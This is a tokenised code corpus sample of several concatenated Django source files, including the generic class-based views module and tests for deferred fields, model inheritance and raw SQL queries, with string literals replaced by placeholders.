<s> from functools import update_wrapper <EOL> from django import http <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . template . response import TemplateResponse <EOL> from django . utils . log import getLogger <EOL> from django . utils . decorators import classonlymethod <EOL> logger = getLogger ( '<STR_LIT>' ) <EOL> class View ( object ) : <EOL> """<STR_LIT>""" <EOL> http_method_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for key , value in kwargs . iteritems ( ) : <EOL> setattr ( self , key , value ) <EOL> @ classonlymethod <EOL> def as_view ( cls , ** initkwargs ) : <EOL> """<STR_LIT>""" <EOL> for key in initkwargs : <EOL> if key in cls . http_method_names : <EOL> raise TypeError ( u"<STR_LIT>" <EOL> u"<STR_LIT>" <EOL> % ( key , cls . __name__ ) ) <EOL> if not hasattr ( cls , key ) : <EOL> raise TypeError ( u"<STR_LIT>" % ( <EOL> cls . __name__ , key ) ) <EOL> def view ( request , * args , ** kwargs ) : <EOL> self = cls ( ** initkwargs ) <EOL> if hasattr ( self , '<STR_LIT>' ) and not hasattr ( self , '<STR_LIT>' ) : <EOL> self . head = self . get <EOL> return self . dispatch ( request , * args , ** kwargs ) <EOL> update_wrapper ( view , cls , updated = ( ) ) <EOL> update_wrapper ( view , cls . dispatch , assigned = ( ) ) <EOL> return view <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> if request . method . lower ( ) in self . http_method_names : <EOL> handler = getattr ( self , request . method . lower ( ) , self . http_method_not_allowed ) <EOL> else : <EOL> handler = self . http_method_not_allowed <EOL> self . request = request <EOL> self . args = args <EOL> self . kwargs = kwargs <EOL> return handler ( request , * args , ** kwargs ) <EOL> def http_method_not_allowed ( self , request , * args , ** kwargs ) : <EOL> allowed_methods = [ m for m in self . http_method_names if hasattr ( self , m ) ] <EOL> logger . warning ( '<STR_LIT>' , request . method , request . path , <EOL> extra = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : self . request <EOL> } <EOL> ) <EOL> return http . HttpResponseNotAllowed ( allowed_methods ) <EOL> class TemplateResponseMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> template_name = None <EOL> response_class = TemplateResponse <EOL> def render_to_response ( self , context , ** response_kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . response_class ( <EOL> request = self . request , <EOL> template = self . get_template_names ( ) , <EOL> context = context , <EOL> ** response_kwargs <EOL> ) <EOL> def get_template_names ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . template_name is None : <EOL> raise ImproperlyConfigured ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> return [ self . template_name ] <EOL> class TemplateView ( TemplateResponseMixin , View ) : <EOL> """<STR_LIT>""" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> return { <EOL> '<STR_LIT>' : kwargs <EOL> } <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> context = self . get_context_data ( ** kwargs ) <EOL> return self . render_to_response ( context ) <EOL> class RedirectView ( View ) : <EOL> """<STR_LIT>""" <EOL> permanent = True <EOL> url = None <EOL> query_string = False <EOL> def get_redirect_url ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . url : <EOL> url = self . url % kwargs <EOL> args = self . request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if args and self . query_string : <EOL> url = "<STR_LIT>" % ( url , args ) <EOL> return url <EOL> else : <EOL> return None <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> url = self . get_redirect_url ( ** kwargs ) <EOL> if url : <EOL> if self . permanent : <EOL> return http . HttpResponsePermanentRedirect ( url ) <EOL> else : <EOL> return http . HttpResponseRedirect ( url ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , self . request . path , <EOL> extra = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : self . request <EOL> } ) <EOL> return http . HttpResponseGone ( ) <EOL> def head ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def options ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) <EOL> def put ( self , request , * args , ** kwargs ) : <EOL> return self . get ( request , * args , ** kwargs ) </s>
<s> from __future__ import absolute_import <EOL> from django . db . models . query_utils import DeferredAttribute <EOL> from django . test import TestCase <EOL> from . models import Secondary , Primary , Child , BigChild , ChildProxy <EOL> class DeferTests ( TestCase ) : <EOL> def assert_delayed ( self , obj , num ) : <EOL> count = <NUM_LIT:0> <EOL> for field in obj . _meta . fields : <EOL> if isinstance ( obj . __class__ . __dict__ . get ( field . attname ) , <EOL> DeferredAttribute ) : <EOL> count += <NUM_LIT:1> <EOL> self . assertEqual ( count , num ) <EOL> def test_defer ( self ) : <EOL> s1 = Secondary . objects . create ( first = "<STR_LIT>" , second = "<STR_LIT>" ) <EOL> p1 = Primary . objects . create ( name = "<STR_LIT>" , value = "<STR_LIT>" , related = s1 ) <EOL> qs = Primary . objects . all ( ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:3> ) <EOL> obj = qs . select_related ( ) . only ( "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( obj , <NUM_LIT:2> ) <EOL> self . assertEqual ( obj . related_id , s1 . pk ) <EOL> self . assert_delayed ( s1 . primary_set . all ( ) . only ( '<STR_LIT>' ) [ <NUM_LIT:0> ] , <NUM_LIT:3> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . extra ( select = { "<STR_LIT:a>" : <NUM_LIT:1> } ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . extra ( select = { "<STR_LIT:a>" : <NUM_LIT:1> } ) . defer ( "<STR_LIT:name>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . only ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" , "<STR_LIT:value>" ) . defer ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . only ( "<STR_LIT:value>" ) [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> obj = qs . only ( ) [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( qs . defer ( None ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . defer ( None ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( qs . defer ( "<STR_LIT:name>" ) . values ( ) [ <NUM_LIT:0> ] , { <EOL> "<STR_LIT:id>" : p1 . id , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : s1 . id , <EOL> } ) <EOL> self . assertEqual ( qs . only ( "<STR_LIT:name>" ) . values ( ) [ <NUM_LIT:0> ] , { <EOL> "<STR_LIT:id>" : p1 . id , <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:value>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : s1 . id , <EOL> } ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT:name>" ) . get ( pk = p1 . pk ) , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . get ( pk = p1 . pk ) , <NUM_LIT:2> ) <EOL> self . assert_delayed ( qs . only ( "<STR_LIT:name>" ) . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assert_delayed ( qs . defer ( "<STR_LIT>" ) . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> obj = Primary . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> Primary . objects . all ( ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> lambda p : p . name <EOL> ) <EOL> Child . objects . create ( name = "<STR_LIT>" , value = "<STR_LIT:foo>" , related = s1 ) <EOL> obj = Child . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = Child . objects . only ( "<STR_LIT:name>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:3> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> BigChild . objects . create ( name = "<STR_LIT>" , value = "<STR_LIT:foo>" , related = s1 , other = "<STR_LIT:bar>" ) <EOL> obj = BigChild . objects . defer ( "<STR_LIT:value>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . defer ( "<STR_LIT>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:1> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . only ( "<STR_LIT:name>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:4> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> obj = BigChild . objects . only ( "<STR_LIT>" ) . get ( name = "<STR_LIT>" ) <EOL> self . assert_delayed ( obj , <NUM_LIT:4> ) <EOL> self . assertEqual ( obj . name , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . value , "<STR_LIT:foo>" ) <EOL> self . assertEqual ( obj . other , "<STR_LIT:bar>" ) <EOL> obj . name = "<STR_LIT>" <EOL> obj . save ( ) <EOL> def test_defer_proxy ( self ) : <EOL> """<STR_LIT>""" <EOL> related = Secondary . objects . create ( first = '<STR_LIT>' , second = '<STR_LIT>' ) <EOL> ChildProxy . objects . create ( name = '<STR_LIT>' , value = '<STR_LIT>' , related = related ) <EOL> children = ChildProxy . objects . all ( ) . select_related ( ) . only ( '<STR_LIT:id>' , '<STR_LIT:name>' ) <EOL> self . assertEqual ( len ( children ) , <NUM_LIT:1> ) <EOL> child = children [ <NUM_LIT:0> ] <EOL> self . assert_delayed ( child , <NUM_LIT:1> ) <EOL> self . assertEqual ( child . name , '<STR_LIT>' ) <EOL> self . assertEqual ( child . value , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> first_name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> last_name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> birthday = models . DateField ( ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . first_name , self . last_name ) <EOL> class ManualPrimaryKeyTest ( models . Model ) : <EOL> id = models . IntegerField ( primary_key = True ) <EOL> data = models . CharField ( max_length = <NUM_LIT:100> ) </s>
<s> from __future__ import absolute_import <EOL> from operator import attrgetter <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from . models import ( Chef , CommonInfo , ItalianRestaurant , ParkingLot , Place , <EOL> Post , Restaurant , Student , StudentWorker , Supplier , Worker , MixinModel ) <EOL> class ModelInheritanceTests ( TestCase ) : <EOL> def test_abstract ( self ) : <EOL> w1 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> w2 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> s = Student . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT:5> , school_class = "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( w1 ) , "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( s ) , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Worker . objects . values ( "<STR_LIT:name>" ) , [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertEqual ( Student . _meta . ordering , [ ] ) <EOL> self . assertRaises ( AttributeError , lambda : CommonInfo . objects . all ( ) ) <EOL> self . assertRaises ( Student . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( Worker . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> sw1 = StudentWorker ( ) <EOL> sw1 . name = "<STR_LIT>" <EOL> sw1 . age = <NUM_LIT> <EOL> sw1 . save ( ) <EOL> sw2 = StudentWorker ( ) <EOL> sw2 . name = "<STR_LIT>" <EOL> sw2 . age = <NUM_LIT> <EOL> sw2 . save ( ) <EOL> self . assertRaises ( Student . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> self . assertRaises ( Worker . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> def test_multiple_table ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" ) <EOL> post . attached_comment_set . create ( content = "<STR_LIT>" , is_spam = True ) <EOL> post . attached_link_set . create ( <EOL> content = "<STR_LIT>" , <EOL> url = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( AttributeError , <EOL> getattr , post , "<STR_LIT>" <EOL> ) <EOL> p1 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> p2 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> r = Restaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = True , <EOL> serves_pizza = False , <EOL> rating = <NUM_LIT:2> <EOL> ) <EOL> c = Chef . objects . create ( name = "<STR_LIT>" ) <EOL> ir = ItalianRestaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = False , <EOL> serves_pizza = False , <EOL> serves_gnocchi = True , <EOL> rating = <NUM_LIT:4> , <EOL> chef = c <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> ir . address = "<STR_LIT>" <EOL> ir . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in Restaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in ItalianRestaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> ) <EOL> self . assertEqual ( Restaurant . _meta . ordering , [ "<STR_LIT>" ] ) <EOL> self . assertQuerysetEqual ( Place . objects . filter ( supplier__name = "<STR_LIT:foo>" ) , [ ] ) <EOL> self . assertRaises ( FieldError , <EOL> Restaurant . objects . filter , supplier__name = "<STR_LIT:foo>" <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( name = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertIs ( type ( p ) , Place ) <EOL> self . assertEqual ( <EOL> p . restaurant , Restaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Place . objects . get ( name = "<STR_LIT>" ) . restaurant . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( name = "<STR_LIT>" ) . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertRaises ( ItalianRestaurant . DoesNotExist , <EOL> lambda : p . restaurant . italianrestaurant <EOL> ) <EOL> self . assertRaises ( Place . DoesNotExist , <EOL> ItalianRestaurant . objects . get , name = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( Place . MultipleObjectsReturned , <EOL> Restaurant . objects . get , id__lt = <NUM_LIT> <EOL> ) <EOL> s1 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s1 . customers = [ r , ir ] <EOL> s2 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s2 . customers = [ ir ] <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertRaises ( Restaurant . DoesNotExist , <EOL> lambda : p . restaurant <EOL> ) <EOL> self . assertEqual ( p . supplier , s1 ) <EOL> self . assertQuerysetEqual ( <EOL> ir . provider . order_by ( "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) , <EOL> ) <EOL> park1 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = s1 <EOL> ) <EOL> park2 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = ir <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( lot__name = "<STR_LIT>" ) . name , <EOL> "<STR_LIT>" <EOL> ) <EOL> rows = Restaurant . objects . filter ( <EOL> serves_hot_dogs = True , name__contains = "<STR_LIT:D>" <EOL> ) . update ( <EOL> name = "<STR_LIT>" , serves_hot_dogs = False <EOL> ) <EOL> self . assertEqual ( rows , <NUM_LIT:1> ) <EOL> r1 = Restaurant . objects . get ( pk = r . pk ) <EOL> self . assertFalse ( r1 . serves_hot_dogs ) <EOL> self . assertEqual ( r1 . name , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . values ( "<STR_LIT:name>" , "<STR_LIT>" ) , [ <EOL> { "<STR_LIT>" : <NUM_LIT:4> , "<STR_LIT:name>" : "<STR_LIT>" } <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:2> , <EOL> lambda : ItalianRestaurant . objects . all ( ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> lambda : ItalianRestaurant . objects . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> def test_mixin_init ( self ) : <EOL> m = MixinModel ( ) <EOL> self . assertEqual ( m . other_attr , <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> from datetime import date <EOL> from django . db . models . sql . query import InvalidQuery <EOL> from django . test import TestCase <EOL> from . models import Author , Book , Coffee , Reviewer , FriendlyAuthor <EOL> class RawQueryTests ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' ] <EOL> def assertSuccessfulRawQuery ( self , model , query , expected_results , <EOL> expected_annotations = ( ) , params = [ ] , translations = None ) : <EOL> """<STR_LIT>""" <EOL> results = list ( model . objects . raw ( query , params = params , translations = translations ) ) <EOL> self . assertProcessed ( model , results , expected_results , expected_annotations ) <EOL> self . assertAnnotations ( results , expected_annotations ) <EOL> def assertProcessed ( self , model , results , orig , expected_annotations = ( ) ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( len ( results ) , len ( orig ) ) <EOL> for index , item in enumerate ( results ) : <EOL> orig_item = orig [ index ] <EOL> for annotation in expected_annotations : <EOL> setattr ( orig_item , * annotation ) <EOL> for field in model . _meta . fields : <EOL> self . assertEqual ( getattr ( item , field . attname ) , <EOL> getattr ( orig_item , field . attname ) ) <EOL> self . assertEqual ( type ( getattr ( item , field . attname ) ) , <EOL> type ( getattr ( orig_item , field . attname ) ) ) <EOL> def assertNoAnnotations ( self , results ) : <EOL> """<STR_LIT>""" <EOL> self . assertAnnotations ( results , ( ) ) <EOL> def assertAnnotations ( self , results , expected_annotations ) : <EOL> """<STR_LIT>""" <EOL> if expected_annotations : <EOL> for index , result in enumerate ( results ) : <EOL> annotation , value = expected_annotations [ index ] <EOL> self . assertTrue ( hasattr ( result , annotation ) ) <EOL> self . assertEqual ( getattr ( result , annotation ) , value ) <EOL> def testSimpleRawQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testRawQueryLazy ( self ) : <EOL> """<STR_LIT>""" <EOL> q = Author . objects . raw ( '<STR_LIT>' ) <EOL> self . assertTrue ( q . query . cursor is None ) <EOL> list ( q ) <EOL> self . assertTrue ( q . query . cursor is not None ) <EOL> def testFkeyRawQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> books = Book . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Book , query , books ) <EOL> def testDBColumnHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> coffees = Coffee . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Coffee , query , coffees ) <EOL> def testOrderHandler ( self ) : <EOL> """<STR_LIT>""" <EOL> selects = ( <EOL> ( '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' ) , <EOL> ) <EOL> for select in selects : <EOL> query = "<STR_LIT>" % select <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testTranslations ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> translations = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , translations = translations ) <EOL> def testParams ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> author = Author . objects . all ( ) [ <NUM_LIT:2> ] <EOL> params = [ author . first_name ] <EOL> results = list ( Author . objects . raw ( query , params = params ) ) <EOL> self . assertProcessed ( Author , results , [ author ] ) <EOL> self . assertNoAnnotations ( results ) <EOL> self . assertEqual ( len ( results ) , <NUM_LIT:1> ) <EOL> def testManyToMany ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> reviewers = Reviewer . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Reviewer , query , reviewers ) <EOL> def testExtraConversions ( self ) : <EOL> """<STR_LIT>""" <EOL> query = "<STR_LIT>" <EOL> translations = { '<STR_LIT>' : '<STR_LIT>' } <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , translations = translations ) <EOL> def testMissingFields ( self ) : <EOL> query = "<STR_LIT>" <EOL> for author in Author . objects . raw ( query ) : <EOL> self . assertNotEqual ( author . first_name , None ) <EOL> self . assertNotEqual ( author . last_name , None ) <EOL> def testMissingFieldsWithoutPK ( self ) : <EOL> query = "<STR_LIT>" <EOL> try : <EOL> list ( Author . objects . raw ( query ) ) <EOL> self . fail ( '<STR_LIT>' ) <EOL> except InvalidQuery : <EOL> pass <EOL> def testAnnotations ( self ) : <EOL> query = "<STR_LIT>" <EOL> expected_annotations = ( <EOL> ( '<STR_LIT>' , <NUM_LIT:3> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> ) <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors , expected_annotations ) <EOL> def testWhiteSpaceQuery ( self ) : <EOL> query = "<STR_LIT>" <EOL> authors = Author . objects . all ( ) <EOL> self . assertSuccessfulRawQuery ( Author , query , authors ) <EOL> def testMultipleIterations ( self ) : <EOL> query = "<STR_LIT>" <EOL> normal_authors = Author . objects . all ( ) <EOL> raw_authors = Author . objects . raw ( query ) <EOL> first_iterations = <NUM_LIT:0> <EOL> for index , raw_author in enumerate ( raw_authors ) : <EOL> self . assertEqual ( normal_authors [ index ] , raw_author ) <EOL> first_iterations += <NUM_LIT:1> <EOL> second_iterations = <NUM_LIT:0> <EOL> for index , raw_author in enumerate ( raw_authors ) : <EOL> self . assertEqual ( normal_authors [ index ] , raw_author ) <EOL> second_iterations += <NUM_LIT:1> <EOL> self . assertEqual ( first_iterations , second_iterations ) <EOL> def testGetItem ( self ) : <EOL> query = "<STR_LIT>" <EOL> third_author = Author . objects . raw ( query ) [ <NUM_LIT:2> ] <EOL> self . assertEqual ( third_author . first_name , '<STR_LIT>' ) <EOL> first_two = Author . objects . raw ( query ) [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> self . assertEqual ( len ( first_two ) , <NUM_LIT:2> ) <EOL> self . assertRaises ( TypeError , lambda : Author . objects . raw ( query ) [ '<STR_LIT:test>' ] ) <EOL> def test_inheritance ( self ) : <EOL> f = FriendlyAuthor . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" , <EOL> dob = date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> ) ) <EOL> query = "<STR_LIT>" <EOL> self . assertEqual ( <EOL> [ o . pk for o in FriendlyAuthor . objects . raw ( query ) ] , [ f . pk ] <EOL> ) <EOL> def test_query_count ( self ) : <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> list , Author . objects . raw ( "<STR_LIT>" ) <EOL> ) </s>
